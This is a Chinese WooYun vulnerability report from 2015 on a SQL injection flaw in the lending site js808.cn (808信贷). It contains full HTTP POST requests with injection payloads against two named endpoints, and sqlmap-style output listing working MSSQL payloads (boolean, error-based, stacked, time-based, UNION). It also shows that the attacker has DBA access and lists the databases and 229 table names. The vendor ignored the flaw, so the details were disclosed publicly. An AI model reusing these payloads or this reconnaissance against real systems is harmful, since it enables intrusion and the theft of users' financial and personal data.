当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110793

漏洞标题:808信贷主站SQL注射泄露大量数据

相关厂商:808信贷

漏洞作者: 路人甲

提交时间:2015-04-28 10:14

修复时间:2015-06-12 10:16

公开时间:2015-06-12 10:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

233

详细说明:

参考:http://wooyun.org/bugs/wooyun-2015-0110567
1,
POST /handle/getHelpContent.ashx HTTP/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.js808.cn/
Cookie: ASP.NET_SessionId=04bquo552xqo1e55vb1onh45; CheckCode=2822
Host: www.js808.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
id=20%20AND%203*2*1%3d6%20AND%20244%3d244
2
POST /newSite/Other/User_unlock.aspx HTTP/1.1
Content-Length: 1694
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=04bquo552xqo1e55vb1onh45; CheckCode=2822
Host: www.js808.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
btnEmail=%e7%a1%ae%e8%ae%a4%e6%8f%90%e4%ba%a4&ddlTypeOne=email&ddlTypeTwo=email&txtCode=94102&txtLockNickname='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(79)%2bCHAR(117)%2bCHAR(105)%2bCHAR(105)%2bCHAR(105)%2bCHAR(82)%2bCHAR(114)%2bCHAR(110))%20FROM%20syscolumns)%2b'&txtonestr=1&txttwostr=1&__VIEWSTATE=/wEPDwUINDA3OTc4NTYPZBYCAgEPZBYEAgEPZBYCAgEPDxYCHgRUZXh0Bc4BIOasoui/juadpeWIsDgwOOe9kee7nOS/oei0t%2bW5s%2bWPsOOAgiZuYnNwOyZuYnNwO1s8YSBocmVmPSdodHRwOi8vd3d3LmpzODA4LmNuL25ld1NpdGUvT3RoZXIvbG9naW5fbmV3LmFzcHgnPueZu%2bW9lTwvYT5dJm5ic3A7WzxhIGhyZWY9J2h0dHA6Ly93d3cuanM4MDguY24vbmV3U2l0ZS9PdGhlci9yZWdpc3Rlcl9OZXcuYXNweCc%2b5YWN6LS55rOo5YaMPC9hPl1kZAITD2QWAgIBDxYCHglpbm5lcmh0bWwFzAU8bGk%2bPGEgaHJlZj0nIyc%2bPGltZyBib3JkZXI9JzAnIHNyYz0nL2ltYWdlcy9idXR0b25fb2xkXzQwLmdpZicgYWx0PSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nIHRpdGxlPSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nPiZuYnNwOzEzODI3MTgwODwvYT4mbmJzcDsmbmJzcDs4MDjpmL/kuL08L2xpPjxsaT48YSBocmVmPScjJz48aW1nIGJvcmRlcj0nMCcgc3JjPScvaW1hZ2VzL2J1dHRvbl9vbGRfNDAuZ2lmJyBhbHQ9J%2beCueWHu%2bi/memHjOe7meaIkeWPkea2iOaBrycgdGl0bGU9J%2beCueWHu%2bi/memHjOe7meaIkeWPkea2iOaBryc%2bJm5ic3A7MTMzODcxODA4PC9hPiZuYnNwOyZuYnNwOzgwOOmYv%2bmbhTwvbGk%2bPGxpPjxhIGhyZWY9JyMnPjxpbWcgYm9yZGVyPScwJyBzcmM9Jy9pbWFnZXMvYnV0dG9uX29sZF80MC5naWYnIGFsdD0n54K55Ye76L%2bZ6YeM57uZ5oiR5Y%2bR5raI5oGvJyB0aXRsZT0n54K55Ye76L%2bZ6YeM57uZ5oiR5Y%2bR5raI5oGvJz4mbmJzcDsxMzgwNzU4MDg8L2E%2bJm5ic3A7Jm5ic3A7ODA46Zi/6ZyePC9saT48bGk%2bPGEgaHJlZj0nIyc%2bPGltZyBib3JkZXI9JzAnIHNyYz0nL2ltYWdlcy9idXR0b25fb2xkXzQwLmdpZicgYWx0PSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nIHRpdGxlPSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nPiZuYnNwOzEzMDk3MTgwODwvYT4mbmJzcDsmbmJzcDs4MDjpmL/oirM8L2xpPmRk

漏洞证明:

---
Parameter: id (POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
Payload: id=(SELECT (CASE WHEN (2692=2692) THEN 2692 ELSE 2692*(SELECT 2692 FROM master..sysdatabases) END))
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=1 AND 4707=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4707=4707) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)))
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3982=3982) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=1;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=1 WAITFOR DELAY '0:0:5'
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(78)+CHAR(86)+CHAR(79)+CHAR(102)+CHAR(65)+CHAR(89)+CHAR(115)+CHAR(122)+CHAR(108)+CHAR(97)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113),NULL,NULL--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user is DBA: True
available databases [6]:
[*] 808_mdbs
[*] master
[*] model
[*] msdb
[*] temp808
[*] tempdb
Database: 808_mdbs
[229 tables]
+----------------------+
| Admin_Sign |
| Admin_User_808 |
| Admin_iplists |
| Android_LoginUser |
| Answer_808 |
| BBS_father |
| BBS_repays |
| BBS_son |
| BBS_tie |
| Bank_infor |
| Block_kf |
| CftWith |
| City_8088 |
| City_8088 |
| CreditEdu |
| CreditLevel |
| CreditSorce_808 |
| CustomerAssess |
| CustomerService |
| DataCensus_TzQj |
| EduApplay_808 |
| Edu_Tb_808 |
| EmailValide |
| Freezingzj |
| Friend_hei |
| Friends_808 |
| FundsInfos |
| Funds_balance |
| GiftsDhlist |
| HelpCenterNews |
| HelpClass |
| Invitefriends |
| IpInfors |
| JkEText |
| Jl_tj |
| Job_Tb_808 |
| LimitSendEmail |
| LimitSendEmail |
| Link_Tb_808 |
| LoanInfos_operate |
| LoanInfos_operate |
| LoanQsmd |
| Loan_Review |
| Loaninfos_userinfos |
| LockUsers |
| Lotter_state |
| MailContents |
| Monitor_Tb |
| OthersiteLoan |
| PastApplay |
| PastEdu |
| Pro_dhPack |
| Product_ScoreDh |
| Product_duInfos |
| Qustion_808 |
| ReceiveLoan |
| Reg_Arrt |
| Repaymentloan |
| SendCollection |
| SiteInfor |
| SiteMail |
| SiteUser_dstj |
| SubmitRepayment |
| SystemFather |
| SystemSon |
| TB_Dyzliao |
| TB_Kdbaoedu |
| TB_Txjietu |
| TB_adm_ywlr |
| TB_secpwd |
| Table_kbao |
| Tb_Managelist |
| Tb_Notice |
| Tb_Suggest |
| Tb_dfusers |
| Tb_otherhmd |
| TempSecid |
| TenderInfos |
| Tender_db |
| TestMess1 |
| TestMess1 |
| Tgnc_table |
| TrackKf |
| Upload_System |
| UserEmailActivate |
| UserLogin_error |
| UserRegister_Actions |
| UserSafety |
| UserScoreDetails |
| UserScore_DhTx |
| UserScore_DhTx |
| UserSendMailInfo |
| UserTbMoneyTj |
| User_Lottery |
| User_TruntableReward |
| User_UnLockInfos |
| User_WriteOff |
| User_aqNotice |
| User_loanIntr |
| Users_upload |
| VW_Yqhmd2 |
| VW_Yqhmd2 |
| VW_ZliaoP |
| VW_dbr |
| VW_suggest |
| Vip_Users_808 |
| Vw_Bbsties |
| Vw_Cftwith |
| Vw_Fkrsjsq |
| Vw_Freezes |
| Vw_Friends |
| Vw_Fundsinfors |
| Vw_IpList |
| Vw_L_Review |
| Vw_Lendmx |
| Vw_LoanInfoShenHe |
| Vw_Loaninformations |
| Vw_LotterState |
| Vw_MailContent |
| Vw_ManageUsers |
| Vw_Monitor |
| Vw_PeduApplay |
| Vw_ProPackInfosList |
| Vw_ProPackList |
| Vw_ProductDhInfo |
| Vw_ProductList |
| Vw_Receives |
| Vw_Remind_users |
| Vw_Repayment |
| Vw_SiteEmails |
| Vw_Tgusers |
| Vw_TieComment |
| Vw_Trender |
| Vw_UserLotter |
| Vw_UserWithDrawList |
| Vw_Valide |
| Vw_VipInfos |
| Vw_admiplist |
| Vw_bbsBlock |
| Vw_belowCz |
| Vw_cs_users |
| Vw_dbeduapplay |
| Vw_edhistory |
| Vw_eduapplay |
| Vw_eduapplay |
| Vw_hk2days |
| Vw_hlists |
| Vw_inforsnews |
| Vw_lockuserLists |
| Vw_remindlist |
| Vw_shzt |
| Vw_tgtc |
| Vw_txusers |
| Vw_user_zc |
| Vw_userje |
| Vw_users |
| Vw_webinfor |
| Vw_withdraws |
| Vw_wztjian_Tb |
| Vw_xcyw |
| Vw_yq_users |
| Vw_yqusers |
| WithDraw_list |
| admin_tb_808 |
| applyloan |
| bank_setqx |
| bbstie_comment |
| begsh_tb |
| below_recharge |
| bjin_vip_vw |
| bjin_vip_vw |
| black |
| comd_list |
| cspimg_808 |
| db_ed_808 |
| db_jktb_808 |
| dbeduapplay |
| dbr_tb |
| dya_table |
| ed_history |
| fkrsjrz |
| fksmrz_tb |
| giftslist |
| gzr_list |
| hid_id_tb |
| jkcls_808 |
| kserver_Tb808 |
| onlineorder |
| pinsorce_808 |
| pro_packinfos |
| provinces_808 |
| pshhe_result |
| second_tb |
| self_table |
| spplun_intrs |
| sysdiagrams |
| temp_allscore |
| temp_allscore |
| test_808 |
| tgtc_tb808 |
| userinfos_808 |
| vw_Bbsreplays |
| vw_Tenderdbmx |
| vw_Tenderdbmx |
| vw_answers |
| vw_bankinfo |
| vw_bankqxuser |
| vw_csusers |
| vw_dbjklist |
| vw_diya |
| vw_edus |
| vw_etextlist |
| vw_fksmrz |
| vw_hei_friend |
| vw_jkcns |
| vw_jksmrz |
| vw_jobs |
| vw_onorders |
| vw_question |
| vw_selftb |
| vw_txhk2tian |
| vw_txremind |
| vw_upphotos |
| vw_userwriteoff |
| vw_wbnotices |
| vw_yqlist |
| wztjian_Tb |
| xc_repaymment |
| xc_tjr |
+----------------------+

修复方案:

~~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)